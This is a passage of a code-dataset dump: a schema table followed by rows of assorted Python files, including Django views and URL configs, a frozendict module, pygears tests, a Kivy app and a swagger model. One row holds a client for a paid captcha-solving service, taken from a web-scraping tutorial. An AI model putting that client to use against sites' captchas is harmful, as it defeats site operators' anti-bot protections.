| Column | Type | Range / values |
| --- | --- | --- |
| blob_id | string | length 40 to 40 |
| directory_id | string | length 40 to 40 |
| path | string | length 3 to 616 |
| content_id | string | length 40 to 40 |
| detected_licenses | list | length 0 to 112 |
| license_type | string | 2 classes |
| repo_name | string | length 5 to 115 |
| snapshot_id | string | length 40 to 40 |
| revision_id | string | length 40 to 40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 to 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 to 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 to 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k to 681M (nullable) |
| star_events_count | int64 | 0 to 209k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 to 2023-09-14 21:59:50 (nullable) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 to 2023-08-21 12:35:19 (nullable) |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 to 10.2M |
| extension | string | 188 classes |
| content | string | length 3 to 10.2M |
| authors | list | length 1 to 1 |
| author_id | string | length 1 to 132 |
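Each record that follows is one pipe-separated row in the column order listed above; the multi-line `content` and `authors` cells spill each row across several lines of text. Because the rows are easier to consume programmatically than visually, here is a minimal sketch of how a dataset with this schema could be streamed and filtered with the Hugging Face `datasets` library. The dataset identifier `org/python-source-files` is a placeholder, since the actual dataset name does not appear in this dump.

```python
from datasets import load_dataset

# Placeholder dataset id: substitute the real name of the dataset shown here.
ds = load_dataset("org/python-source-files", split="train", streaming=True)

def keep(row):
    # Keep small, hand-written files: not vendored, not auto-generated.
    return (not row["is_vendor"]
            and not row["is_generated"]
            and row["length_bytes"] < 50_000)

for row in filter(keep, ds):
    print(row["repo_name"], row["path"], row["license_type"])
    print(row["content"][:200])  # first 200 characters of the source file
    break
```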
dbf95929d8d6ee23c4ba280b0087426af2f2d6a7 | f966c891c666db846d86406cb9c08a530902d032 | /algorithms/implementation/larrys_array.py | 463216acec541b8c6a7c8847fad3576cde14e85c | []
| no_license | rickharris-dev/hacker-rank | 36620a16894571e324422c83bd553440cf5bbeb1 | 2ad0fe4b496198bec1b900d2e396a0704bd0c6d4 | refs/heads/master | 2020-12-25T14:33:20.118325 | 2016-09-06T01:10:43 | 2016-09-06T01:10:43 | 67,264,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | #!/usr/bin/python
t = int(raw_input().strip())
for i in range(0,t):
    n = int(raw_input().strip())
    a = map(int,raw_input().strip().split(' '))
    inversions = 0
    for j in range(0,n):
        inversions += abs(a[j] - (j + 1))
        while j > 0:
            if a[j - 1] > a[j]:
                swap = a[j]
                a[j] = a[j - 1]
                a[j - 1] = swap
                inversions -= 1
                j -= 1
            else:
                break
    if inversions % 2 == 0:
        print "YES"
    else:
        print "NO"
| [
"[email protected]"
]
| |
00100d269f830789446f2c2dec2b09e8f48e9b1a | 7823d31688879b2d4dcfd2e3c11fb2c862f35a23 | /image_retrieval/server/algorithm/__init__.py | 54615a50ab3d115940cbce7402700f464f4a7c66 | []
| no_license | FMsunyh/dlfive | 7637631f54520673e4ec417b3c02b5334ecdf026 | ffae48aac5ece4de5ff9afccc69b093a72e09637 | refs/heads/master | 2021-09-19T05:59:51.040214 | 2018-07-24T06:29:40 | 2018-07-24T06:29:40 | 108,929,499 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 12/7/2017 9:32 AM
# @Author : sunyonghai
# @File : __init__.py.py
# @Software: BG_AI
# ========================================================= | [
"[email protected]"
]
| |
9cdf17ae4fea3bd58bf6f8194f281cd060691c43 | 84cfe9b0ca7209487231e0725f7ad0d233f09544 | /stylemaster/urls.py | 75696e60c98bc0d947c8565e886e11919a73a7fd | []
| no_license | archit-dwevedi/M4Plan | 3eefc12ea447d624bae6f758c3648d7caf825c1a | d162592748ea37bc070b6217365e8601a6ccdd9a | refs/heads/master | 2021-10-26T23:22:04.456014 | 2019-04-14T20:02:17 | 2019-04-14T20:02:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,074 | py | from django.urls import path
from stylemaster import views
from M3_Project import settings
from django.conf.urls.static import static
urlpatterns=[
path('sample/', views.sample, name='sample'),
path('stylemaster/', views.style, name='style'),
path('stylefull/', views.stylefull, name='stylefull'),
path('fabric/', views.fabric, name='fabric'),
path('trims/', views.trims, name='trims'),
path('preview/',views.preview,name='preview'),
path('BOM_selection/',views.bom_select,name='bom_select'),
path('bomfill/',views.bomfill,name='bomfill'),
path('Bill_of_materials/',views.bom,name='bom'),
path('update/<int:pk>',views.update.as_view(),name='update'),
path('styleorder/',views.styleorder,name='styleorder'),
path('dash_styleorder/',views.dashorder,name='dash_styleorder'),
path('garment/',views.garmentitem,name='garment'),
path('dashgarment/',views.dashgarment,name='dashgarment'),
]
if settings.DEBUG:
    urlpatterns+=static(settings.STATIC_URL,document_root=settings.STATICFILES_DIRS) | [
"[email protected]"
]
| |
cb45ff90aa4660fc5bccac79d5c77c74cb64959e | 76c50a9849b4093c6339dfeff888a5a0672a92bc | /yatsm/pipeline/_topology.py | c1ea0e9ff58ace0c4bec6246c61d26cf8edf1d40 | [
"MIT"
]
| permissive | valpasq/yatsm | d2fac9c7eea6f8a785d6c5b6c24196bb9f441db0 | 44e2124c1bae3dd4245437475d709187f52d376d | refs/heads/master | 2021-01-18T07:40:33.260515 | 2016-09-13T16:22:36 | 2016-09-13T16:22:36 | 40,021,588 | 0 | 0 | null | 2015-07-31T19:30:14 | 2015-07-31T19:30:14 | null | UTF-8 | Python | false | false | 4,509 | py | """ Build pipeline dependency graph from requirements
"""
from collections import defaultdict
import logging
import six
import toposort
from .language import OUTPUT, REQUIRE, PIPE
logger = logging.getLogger(__name__)
def format_deps(d):
""" Return formatted list of dependencies from 'requires'/'provides'
Transform as follows:
.. code-block:: python
>>> d = {
'data': ['red', 'nir', 'ndvi'],
'record': ['ccdc'],
}
>>> format_deps(d)
['data-red', 'data-nir', 'data-ndvi', 'record-ccdc']
Args:
d (dict): Task specification, requirements or provisions
Returns:
list: Formatted names of task dependencies
"""
out = []
for _type, names in six.iteritems(d):
out.extend(['%s-%s' % (_type, name) for name in names])
return out
def pipe_deps(pipe):
""" Format data and record in a `pipe`
Provides references to dataset bands and record information in `pipe`.
Args:
pipe (dict): A "pipeline" object containing `data` and `record` as
keys.
Returns:
dict: Dependency graph for data or results inside of `pipe`
"""
dsk = {PIPE: set()}
deps = {
'data': pipe['data'].keys(),
'record': pipe['record'].keys()
}
_deps = format_deps(deps)
for _dep in _deps:
dsk[_dep] = set([PIPE])
return dsk
def config_to_deps(config, dsk=None, overwrite=True):
""" Convert a pipeline specification into list of tasks
Args:
config (dict): Specification of pipeline tasks
dsk (dict): Optionally, provide a dictionary that already includes
some dependencies. The values of this dict should be sets.
overwrite (bool): Allow tasks to overwrite values that have already
been computed
Returns:
dict: Dependency graph
"""
dsk = defaultdict(set, dsk) if dsk else defaultdict(set)
for task, spec in config.items():
# from IPython.core.debugger import Pdb; Pdb().set_trace()
# Add in task requirements
deps = format_deps(spec[REQUIRE])
dsk[task] = dsk[task].union(deps)
# Add in data/record provided by task
prov = format_deps(spec[OUTPUT])
task_needed = False
for _prov in prov:
if overwrite or _prov not in dsk:
logger.debug('Adding task: {}'.format(task))
dsk[_prov].add(task)
task_needed = True
else:
logger.debug('Task already computed and not overwrite - not '
'adding: {}'.format(task))
# If this task didn't provide any new data/record, cull it
if not task_needed:
logger.debug('Culling task {} because everything it provides is '
'already calculated (e.g., from cache)'.format(task))
del dsk[task]
return dsk
def validate_dependencies(tasks, dsk):
""" Check that all required tasks are provided by `dsk`
Args:
tasks (Sequence[str]): Tasks to run, given in order of dependency
dsk (dict[str, set[str]]): Dependency graph
Returns:
list[str]: List of input tasks
Raises:
KeyError: Raise if not all dependencies are met
"""
# First validate the DAG
for task, deps in dsk.items():
check = [dep in dsk for dep in deps]
if not all(check):
missing = [dep for dep, ok in zip(deps, check) if not ok]
missing_str = ', '.join(['%i) "%s"' % (i + 1, m) for i, m in
enumerate(missing)])
raise KeyError('Task "{}" has unmet dependencies: {}'
.format(task, missing_str))
return tasks
def config_to_tasks(config, pipe, overwrite=True):
""" Return a list of tasks from a pipeline specification
Args:
config (dict): Pipeline specification
pipe (dict): Container storing `data` and `record` keys
overwrite (bool): Allow tasks to overwrite values that have already
been computed
Returns:
list: Tasks to run from the pipeline specification, given in the
order required to fullfill all dependencies
"""
_dsk = pipe_deps(pipe)
dsk = config_to_deps(config, dsk=_dsk, overwrite=overwrite)
tasks = [task for task in toposort.toposort_flatten(dsk)
if task in config.keys()]
return validate_dependencies(tasks, dsk)
| [
"[email protected]"
]
| |
4bcb2952ab0ade3293adefae13298275dbcebc72 | 562d4bf000dbb66cd7109844c972bfc00ea7224c | /addons/odoope_einvoice_base/__init__.py | b76d1966445c061ecc7fae89cd3e5df0d1312dda | []
| no_license | Mohamed33/odoo-efact-11-pos | e9da1d17b38ddfe5b2d0901b3dbadf7a76bd2059 | de38355aea74cdc643a347f7d52e1d287c208ff8 | refs/heads/master | 2023-03-10T15:24:44.052883 | 2021-03-06T13:25:58 | 2021-03-06T13:25:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2009-TODAY Odoo Peru(<http://www.odooperu.pe>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from . import models
# eof:__init__.py
| [
"[email protected]"
]
| |
0a21c6b0ff04ff6534154bec8bff731a7f7907b5 | e60dd32858b162eb28e673ac9cfdb1b2a403c695 | /sysarg.py | 3e9a23ccdeb728110b5997db37732dd3a8d084f6 | []
| no_license | Hemanthtm2/playing_python | 8d3419a46d50b2801283aa020be89a8003d4ad31 | cb896916c6d84c564f7036a4ed6a2a5481bf2fd6 | refs/heads/master | 2020-05-23T13:10:51.753218 | 2019-02-20T21:52:34 | 2019-02-20T21:52:34 | 186,767,575 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | #!/usr/bin/python
import sys
script_name=sys.argv[0]
arguments=sys.argv[1:]
print(len(arguments))
| [
"[email protected]"
]
| |
967b0cd790a778ad56557cb88098e499ebd5e7e5 | 4be96ec1670297ae71efa6c5c4a830255f893743 | /Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/conda/_vendor/frozendict.py | eeeebf38e22db3bbdce97652812fe2fe6057657f | [
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-free-unknown",
"Python-2.0",
"Apache-2.0",
"BSD-3-Clause",
"MIT"
]
| permissive | zooba/PTVS | 7dbcc0165ded98d077040a6b367fd71a1eb1e6bd | 0c213e901168fee368a32939256174077a8d4dfa | refs/heads/master | 2021-05-23T03:58:11.007138 | 2021-01-26T00:20:40 | 2021-01-26T00:20:40 | 42,481,352 | 1 | 0 | Apache-2.0 | 2018-11-19T19:30:24 | 2015-09-14T22:47:51 | C# | UTF-8 | Python | false | false | 2,909 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2012 Santiago Lezica
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# source: https://raw.githubusercontent.com/slezica/python-frozendict/c5d16bafcca7b72ff3e8f40d3a9081e4c9233f1b/frozendict/__init__.py
# version: 1.2
# date: 2018-06-29
try:
    from collections.abc import Mapping
except ImportError:
    from collections import Mapping
try:
    from collections import OrderedDict
except ImportError:  # python < 2.7
    OrderedDict = NotImplemented
iteritems = getattr(dict, 'iteritems', dict.items)  # py2-3 compatibility

class frozendict(Mapping):
    """
    An immutable wrapper around dictionaries that implements the complete :py:class:`collections.Mapping`
    interface. It can be used as a drop-in replacement for dictionaries where immutability is desired.
    """
    dict_cls = dict

    def __init__(self, *args, **kwargs):
        self._dict = self.dict_cls(*args, **kwargs)
        self._hash = None

    def __getitem__(self, key):
        return self._dict[key]

    def __contains__(self, key):
        return key in self._dict

    def copy(self, **add_or_replace):
        return self.__class__(self, **add_or_replace)

    def __iter__(self):
        return iter(self._dict)

    def __len__(self):
        return len(self._dict)

    def __repr__(self):
        return '<%s %r>' % (self.__class__.__name__, self._dict)

    def __hash__(self):
        if self._hash is None:
            h = 0
            for key, value in iteritems(self._dict):
                h ^= hash((key, value))
            self._hash = h
        return self._hash

    def __json__(self):
        # Works with auxlib's EntityEncoder.
        return self._dict

class FrozenOrderedDict(frozendict):
    """
    A frozendict subclass that maintains key order
    """
    dict_cls = OrderedDict

if OrderedDict is NotImplemented:
    del FrozenOrderedDict
| [
"[email protected]"
]
| |
25af442b950800e054a759cc21320c8ce9953edf | 172c00532812041f491ccea4a548401e9148864c | /feedback_form/urls.py | 8d80bbe0d2024471abdb62d308c7f902f5008db9 | []
| no_license | henokali1/FANS-feedback-form | 34830f5d7740f3578b13e5d8f46e2372492e0733 | ab15cc736571ff55a06ea3e6275428077ef08fde | refs/heads/master | 2020-04-09T02:29:05.240720 | 2018-12-04T03:23:32 | 2018-12-04T03:23:32 | 159,942,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | from django.contrib import admin
from django.urls import path, include
from django.views.generic.base import TemplateView
from trainee_feedback.views import feedback_view, add_feedback_view, thankyou_view, trainer_view, report_view, feedback_detail_view
urlpatterns = [
path('', TemplateView.as_view(template_name='home.html'), name='home'),
path('admin/', admin.site.urls),
path('users/', include('users.urls')),
path('users/', include('django.contrib.auth.urls')),
path('feedback/', feedback_view),
path('add_feedback/', add_feedback_view),
path('thankyou/', thankyou_view),
path('trainer/', trainer_view),
path('report/', report_view),
path('feedback_detail/<int:pk>/', feedback_detail_view),
]
| [
"[email protected]"
]
| |
fc2d3910ce1955870202ad5072111d79369813a1 | 48ca6f9f041a1e9f563500c8a7fa04dbb18fa949 | /tests/lib/cast/test_to_int.py | 020a6156975f87a7f23d58cb567094342d837c05 | [
"MIT"
]
| permissive | bogdanvuk/pygears | 71404e53d4689ec9cdd9db546bfc0f229a7e02da | 705b11ab6de79868b25753fa9d0ce7128791b346 | refs/heads/master | 2023-07-08T11:38:54.625172 | 2022-03-07T12:29:00 | 2022-03-07T12:29:00 | 124,890,922 | 146 | 16 | MIT | 2022-08-15T07:57:08 | 2018-03-12T13:10:06 | Python | UTF-8 | Python | false | false | 1,605 | py | import pytest
from pygears.typing import Int, Tuple, Ufixp, Uint, cast
def test_ufixp_type_cast():
    assert cast(Ufixp[8, 16], Int) == Int[9]
    assert cast(Ufixp[8, 16], Int[16]) == Int[16]
    assert cast(Ufixp[16, 8], Int) == Int[17]
    with pytest.raises(TypeError):
        cast(Ufixp[-1, 16], Int)

def test_ufixp_value_cast():
    assert cast(Ufixp[8, 16](2.15), Int) == Int[9](2)
    assert cast(Ufixp[8, 16](2.15), Int[16]) == Int[16](2)
    with pytest.raises(TypeError):
        cast(Ufixp[-1, 16](0.15), Int)
    assert cast(Ufixp[-1, 16](0.15), Int[16]) == Int[16](0)
    with pytest.raises(TypeError):
        cast(Ufixp[8, 16](56.15), Int[8])

def test_uint_type_cast():
    assert cast(Uint[8], Int) == Int[9]
    assert cast(Uint[8], Int[16]) == Int[16]
    with pytest.raises(TypeError):
        cast(Uint[8], Int[8])
    assert cast(Int[8], Int) == Int[8]
    assert cast(Int[8], Int[16]) == Int[16]
    with pytest.raises(TypeError):
        cast(Int[8], Int[4])

def test_number_value_cast():
    assert cast(Uint[8](128), Int[16]) == Int[16](128)
    assert cast(Int[8](127), Int[8]) == Int[8](127)
    with pytest.raises(TypeError):
        cast(Uint[16](128), Int[16])
    with pytest.raises(TypeError):
        cast(Int[16](-128), Int[8])
    assert cast(2.15, Int[4]) == Int[4](2)
    assert cast(7, Int[4]) == Int[4](7)
    assert cast(-8, Int[4]) == Int[4](-8)
    with pytest.raises(ValueError):
        cast(-9, Int[4])

def test_unsupported_cast():
    for t in [Tuple[Int[2], Uint[2]]]:
        with pytest.raises(TypeError):
            cast(t, Int)
| [
"[email protected]"
]
| |
a9add2a2807b26acdea921f6e43d510209324db8 | 7b2d14f78099fde6c4a35082c9c294d1771cb163 | /Week 12/templates/paint.py | e9129563cd2af70c80bb773c5f863d15f03febb8 | []
| no_license | pinardy/Digital-World | 04c6ddb369ede7295a0891aaaa006486c557965e | dd0a351eb64f05b524b08c47cd0c0ad3eadd775c | refs/heads/master | 2020-12-30T22:45:02.448171 | 2018-01-30T03:06:08 | 2018-01-30T03:06:08 | 80,622,946 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,281 | py | from random import random
from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.widget import Widget
from kivy.graphics import Color, Line, Rectangle
from kivy.uix.filechooser import FileChooserListView, FileChooserIconView
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.image import Image
class MyBackground(Widget):
    def __init__(self, **kwargs):
        super(MyBackground, self).__init__(**kwargs)
        with self.canvas:
            self.bg = Rectangle(source='water.png', pos=self.pos, size=self.size)
        self.bind(pos=self.update_bg)
        self.bind(size=self.update_bg)

    def update_bg(self, *args):
        self.bg.pos = self.pos
        self.bg.size = self.size

class MyPaintWidget(Widget):
    def on_touch_down(self, touch):
        color = (random(), random(), random())
        with self.canvas:
            Color(*color)
            d = 30.
            touch.ud['line'] = Line(points=(touch.x, touch.y))

    def on_touch_move(self, touch):
        touch.ud['line'].points += [touch.x, touch.y]

class MyPaintApp(App):
    def build(self):
        parent = MyBackground()
        painter = MyPaintWidget()
        parent.add_widget(painter)
        return parent

if __name__ == '__main__':
    MyPaintApp().run() | [
"[email protected]"
]
| |
a56accc8bb039caa306a869de4e06b475ff2da4e | 0669d94428c972da19346e356861bf11bd668bc9 | /swagger_client/models/listenoire_reponse.py | 371bc0bc9cc54f00a8cea83fb5cd140194c384cf | []
| no_license | mlemee/iSendProPython | e9a0f8351e33ae7598bd1380a26c2fe0a1dacd22 | 3add878dbcd682aa41f2bd07f98d8b56c8e5f9f3 | refs/heads/master | 2022-06-10T02:27:12.368498 | 2020-05-04T15:48:13 | 2020-05-04T15:48:13 | 261,206,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,925 | py | # coding: utf-8
"""
API iSendPro
[1] Liste des fonctionnalités : - envoi de SMS à un ou plusieurs destinataires, - lookup HLR, - récupération des récapitulatifs de campagne, - gestion des répertoires, - ajout en liste noire. - comptage du nombre de caractères des SMS [2] Pour utiliser cette API vous devez: - Créer un compte iSendPro sur https://isendpro.com/ - Créditer votre compte - Remarque: obtention d'un crédit de test possible sous conditions - Noter votre clé de compte (keyid) - Elle vous sera indispensable à l'utilisation de l'API - Vous pouvez la trouver dans le rubrique mon \"compte\", sous-rubrique \"mon API\" - Configurer le contrôle IP - Le contrôle IP est configurable dans le rubrique mon \"compte\", sous-rubrique \"mon API\" - Il s'agit d'un système de liste blanche, vous devez entrer les IP utilisées pour appeler l'API - Vous pouvez également désactiver totalement le contrôle IP # noqa: E501
OpenAPI spec version: 1.1.1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.listenoire_reponse_etat import LISTENOIREReponseEtat # noqa: F401,E501
class LISTENOIREReponse(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'etat': 'LISTENOIREReponseEtat'
}
attribute_map = {
'etat': 'etat'
}
def __init__(self, etat=None): # noqa: E501
"""LISTENOIREReponse - a model defined in Swagger""" # noqa: E501
self._etat = None
self.discriminator = None
if etat is not None:
self.etat = etat
@property
def etat(self):
"""Gets the etat of this LISTENOIREReponse. # noqa: E501
:return: The etat of this LISTENOIREReponse. # noqa: E501
:rtype: LISTENOIREReponseEtat
"""
return self._etat
@etat.setter
def etat(self, etat):
"""Sets the etat of this LISTENOIREReponse.
:param etat: The etat of this LISTENOIREReponse. # noqa: E501
:type: LISTENOIREReponseEtat
"""
self._etat = etat
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, LISTENOIREReponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
]
| |
added45d9f890ae16299a1fb849752c08c2c61d8 | 2e70b3ce93762c5b66fba57f8b9cba37aacf0702 | /new/jamah/views.py | 1f7fc766792333f3fa42f0bba092105be267c21e | []
| no_license | mahidul-islam/jamah | 02be511fe119e8934ec7d5aa1eaa8e2b24fad246 | c8ddf9a8094d33e8b1d6cb834eab3d9f18b1a9ea | refs/heads/master | 2022-05-13T15:11:38.609550 | 2019-06-08T04:52:09 | 2019-06-08T04:52:09 | 184,331,276 | 2 | 0 | null | 2022-04-22T21:27:18 | 2019-04-30T21:04:06 | Python | UTF-8 | Python | false | false | 6,444 | py | from django.shortcuts import render
from django.template import loader
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
from django.utils import timezone
from django.contrib import messages
from .forms import JamahCreateForm
from event.forms import EventCreateForm
from .models import Jamah, JamahMember
from user.models import MyUser
from event.models import Event, EventMember
from account.models import Account
def index(request):
template = loader.get_template('jamah/index.html')
if request.user.is_authenticated:
form = JamahCreateForm()
jamah_by_me = Jamah.objects.filter(creator = request.user)
jamah_by_all = request.user.jamahs_of_you.all()
all_jamah = Jamah.objects.all()
# print(jamah_by_all)
# print('-----------------------------------------------------------------')
context = {
'form': form,
'jamah_by_me': jamah_by_me,
'jamah_by_all': jamah_by_all,
}
return HttpResponse(template.render(context, request))
else:
context = {}
messages.info(request, 'Please Log in to use this feature')
return HttpResponse(template.render(context, request))
def detail(request, jamah_id):
jamah = Jamah.objects.get(pk = jamah_id)
jamahmembers = jamah.members.all()
events = jamah.events.all()
template = loader.get_template('jamah/detail.html')
form = EventCreateForm()
context = {
'eventForm': form,
'events': events,
'jamah': jamah,
}
return HttpResponse(template.render(context, request))
def alljamah(request):
template = loader.get_template('jamah/jamahs.html')
if request.user.is_authenticated:
form = JamahCreateForm()
all_jamah = Jamah.objects.all()
context = {
'form': form,
'all_jamah': all_jamah,
}
return HttpResponse(template.render(context, request))
else:
context = {}
messages.info(request, 'Please Log in to use this feature')
return HttpResponse(template.render(context, request))
def join_jamah(request, jamah_id):
jamah = Jamah.objects.get(pk = jamah_id)
# test if he requested already
jamahMember = JamahMember.objects.filter(member = request.user).filter(jamah = jamah)
if jamahMember.count():
jamahMember = jamahMember[0]
if jamahMember.still_to_be_excepted:
messages.success(request, 'You already requested to join !!!')
return HttpResponseRedirect(reverse('jamah:all_jamah'))
else:
messages.success(request, 'You already are a Member !!!')
return HttpResponseRedirect(reverse('jamah:all_jamah'))
else:
# user didnot requested before so create jamahMember
jamah.requested_to_join.add(request.user)
jamah.save()
account = Account(description = 'Jamah: ' + jamah.jamahname + ' ' + ' ,Member: ' + request.user.username)
account.save()
jamahMember = JamahMember(member=request.user, jamah=jamah, status='member', account=account).save()
messages.success(request, 'You requested to join the Group')
return HttpResponseRedirect(reverse('jamah:all_jamah'))
def create(request):
name = request.POST['jamahname']
account = Account(description = 'Jamah: ' + name + '\'s account')
account.save()
jamah = Jamah(jamahname = name, creator = request.user, account=account)
jamah.save()
jamah.members.add(request.user)
jamah.save()
account2 = Account(description = 'Jamah: ' + name + ' ' + ' ,Member: ' + request.user.username)
account2.save()
jamahMember = JamahMember(
member = request.user,
jamah = jamah,
status = 'creator',
still_to_be_excepted = False,
account = account2
).save()
# print(jamahMember)
return HttpResponseRedirect(reverse('jamah:all_jamah'))
def save_member(request, jamah_id, jamahmember_id):
jamah = Jamah.objects.get(pk = jamah_id)
jamahmember = JamahMember.objects.get(pk = jamahmember_id)
jamahmember.still_to_be_excepted = False
jamah.members.add(jamahmember.member)
jamah.requested_to_join.remove(jamahmember.member)
jamahmember.timestamp = timezone.now()
jamah.save()
jamahmember.save()
return HttpResponseRedirect(reverse('jamah:detail', args = (jamah_id,)))
def remove_member(request, jamah_id, member_id):
jamah = Jamah.objects.get(pk = jamah_id)
member = MyUser.objects.get(pk = member_id)
jamahmember = JamahMember.objects.get(jamah=jamah, member=member)
jamahmember.account.delete()
jamahmember.delete()
jamah.members.remove(member)
# print(event.members.all())
return HttpResponseRedirect(reverse('event:detail', args = (event_id,)))
def promote_member(request, jamah_id, member_id):
jamah = Jamah.objects.get(pk = jamah_id)
member = MyUser.objects.get(pk = member_id)
jamahmember = JamahMember.objects.get(jamah=jamah, member=member)
if jamahmember.status == 'member':
jamahmember.status = 'admin'
elif jamahmember.status == 'admin':
jamahmember.status = 'modarator'
jamahmember.save()
# print(event.members.all())
return HttpResponseRedirect(reverse('event:detail', args = (event_id,)))
def create_jamah_event(request, jamah_id):
jamah = Jamah.objects.get(pk = jamah_id)
name = request.POST['name']
messages.success(request, 'Added a Event for the jamah...')
account = Account(description = 'Event: ' + name + '\'s account')
account.save()
cost_account = Account(description = 'Event: ' + name + '\'s cost account')
cost_account.save()
event = Event(name = name, creator = request.user, account = account, jamah=jamah, cost_account=cost_account)
event.save()
event.members.add(request.user)
event.save()
member_account = Account(description = 'Event: ' + name + ' ' + ' ,Member: ' + request.user.username)
member_account.mother_account = event.account
member_account.save()
eventMember = EventMember(
member = request.user,
event = event,
status = 'creator',
accountant_account = member_account,
is_accountant = True,
is_head_accountant = True,
is_cost_observer = True,
).save()
return HttpResponseRedirect(reverse('jamah:detail', args = (jamah_id,)))
| [
"[email protected]"
]
| |
049aca3df698e02af2e577d8085b003078f81c03 | 187af52e7f5150a5341aaf0c245baefa5e44d2e0 | /爬虫/第八章/3.点触验证码的识别/captach.py | 713d7a21412eef592285e25417c0dcf1c2c798b6 | []
| no_license | ShaoLay/Python_PaChong | ea9bc3880daf5d775f214017184d70a63cd1130a | 97db513ee07a14e07afa785628864d46cdb9ad03 | refs/heads/master | 2020-04-07T16:58:29.916471 | 2018-12-17T07:02:12 | 2018-12-17T07:02:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,389 | py | import requests
from hashlib import md5
class Chaojiying(object):

    def __init__(self, username, password, soft_id):
        self.username = username
        self.password = md5(password.encode('utf-8')).hexdigest()
        self.soft_id = soft_id
        self.base_params = {
            'user': self.username,
            'pass2': self.password,
            'softid': self.soft_id,
        }
        self.headers = {
            'Connection': 'Keep-Alive',
            'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
        }

    def post_pic(self, im, codetype):
        """
        im: image bytes
        codetype: captcha type, see http://www.chaojiying.com/price.html
        """
        params = {
            'codetype': codetype,
        }
        params.update(self.base_params)
        files = {'userfile': ('ccc.jpg', im)}
        r = requests.post('http://upload.chaojiying.net/Upload/Processing.php', data=params, files=files,
                          headers=self.headers)
        return r.json()

    def report_error(self, im_id):
        """
        im_id: image ID of the captcha being reported as mis-recognized
        """
        params = {
            'id': im_id,
        }
        params.update(self.base_params)
        r = requests.post('http://upload.chaojiying.net/Upload/ReportError.php', data=params, headers=self.headers)
        return r.json()
| [
"[email protected]"
]
| |
0fafd36ef08142b623213dd91d2bc34c83e31bda | 0191d4695198ecc61ef9f599c07b3372e7ff10b8 | /album/views.py | 7ef7db17cbee57b293dad8a4b3bbbe31fc1e1298 | []
